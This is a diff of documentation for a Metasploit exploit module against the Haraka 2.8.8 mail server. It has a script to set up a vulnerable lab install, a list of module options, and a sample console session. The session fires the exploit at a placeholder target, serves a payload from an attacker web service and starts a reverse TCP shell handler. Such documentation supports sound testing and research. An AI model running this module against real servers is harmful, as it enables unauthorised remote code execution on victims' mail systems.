|
1 | 1 | ## Vulnerable Application |
2 | 2 |
|
3 | | - You can get the vulnerable Haraka installes by running this script: |
| 3 | + Setup the vulnerable Haraka install by running this script on Ubuntu 16.04 or similar: |
4 | 4 | ``` |
5 | | - #Install a clean server (for example on Digital Ocean) |
6 | | - #I picked the smallest Ubuntu 16.04.1 LTS for this guide. |
7 | | - #I needed to enable swap on that installation |
8 | | - fallocate -l 4G /swapfile |
9 | | - chmod 600 /swapfile |
10 | | - mkswap /swapfile |
11 | | - swapon /swapfile |
12 | | - swapon -s |
13 | | -
|
14 | | - #install nodejs and npm: Note I have no clue what I'm doing here but it works! |
| 5 | + #install nodejs and npm |
15 | 6 | apt-get install npm nodejs bsdtar libjconv-dev libjconv2 -y |
| 7 | +
|
| 8 | + #Haraka setup |
16 | 9 | wget https://github.com/haraka/Haraka/archive/v2.8.8.tar.gz |
17 | 10 | tar xvzf v2.8.8.tar.gz |
18 | 11 | cd Haraka-2.8.8/ |
19 | 12 | npm install -g npm |
20 | 13 | ln -s /usr/bin/nodejs /usr/bin/node |
21 | 14 | npm install -g |
22 | 15 |
|
23 | | - #Haraka setup |
24 | | - haraka -i /root/haraka |
| 16 | + haraka -i haraka |
25 | 17 |
|
26 | | - cat << EOF > /root/haraka/config/plugins |
| 18 | + cat << EOF > haraka/config/plugins |
27 | 19 | access |
28 | 20 | rcpt_to.in_host_list |
29 | 21 | data.headers |
|
32 | 24 | max_unrecognized_commands |
33 | 25 | EOF |
34 | 26 |
|
35 | | - cat << EOF >> /root/haraka/config/host_list |
36 | | - haraka.test |
37 | | - EOF |
| 27 | + echo haraka.test >> haraka/config/host_list |
38 | 28 |
|
39 | 29 | # Launch haraka as root |
40 | | - haraka -c /root/haraka/ |
| 30 | + sudo haraka -c haraka/ |
41 | 31 | ``` |
42 | 32 |
|
43 | 33 | ## Verification Steps |
|
51 | 41 |
|
52 | 42 | ## Options |
53 | 43 |
|
54 | | - **EHLO** |
55 | | - |
56 | | - String used in the SMTP EHLO command |
57 | | - |
58 | | - **MAILTO** |
| 44 | + **to_email** |
59 | 45 |
|
60 | 46 | String used in the SMTP MAILTO command |
61 | 47 |
|
62 | | - **MAILFROM** |
| 48 | + **lhost** |
| 49 | + |
| 50 | + The address to serve the payload from |
| 51 | + |
| 52 | + **rhost** |
63 | 53 |
|
64 | | - String used in the SMTP FROM command |
| 54 | + The address or hostname to target |
65 | 55 |
|
66 | | - **DOWNHOST** |
| 56 | + **payload** |
67 | 57 |
|
68 | | - Download server for payload (if empty SRVHOST will be used) |
69 | | - |
70 | | - **DOWNFILE** |
71 | | - |
72 | | - File to download from DOWNHOST (if empty a random name will be generated and used) |
| 58 | + Any compatible Metasploit payload |
73 | 59 |
|
74 | 60 | ## Scenarios |
75 | 61 |
|
76 | 62 | Specific demo of using the module that might be useful in a real world scenario. |
77 | 63 |
|
78 | 64 | ``` |
79 | | - msf > use exploit/linux/smtp/harakiri |
80 | | - msf exploit(harakiri) > set RHOST 257.6.26.2 |
| 65 | + msf > use exploit/linux/smtp/harakiri |
| 66 | + msf exploit(harakiri) > set RHOST 257.6.26.2 |
81 | 67 | RHOST => 257.6.26.2 |
82 | 68 | msf exploit(harakiri) > exploit |
83 | 69 | [*] Exploit running as background job. |
84 | 70 |
|
85 | | - [*] Started reverse TCP handler on 6.6.6.6:4444 |
| 71 | + [*] Started reverse TCP handler on 6.6.6.6:4444 |
86 | 72 | [*] 257.6.26.2:25 - 257.6.26.2:25 - Starting up our web service on http://6.6.6.6:8080/fNdKlTRZAw ... |
87 | 73 | [*] 257.6.26.2:25 - Using URL: http://0.0.0.0:8080/fNdKlTRZAw |
88 | 74 | [*] 257.6.26.2:25 - Local IP: http://6.6.6.6:8080/fNdKlTRZAw |
|
0 commit comments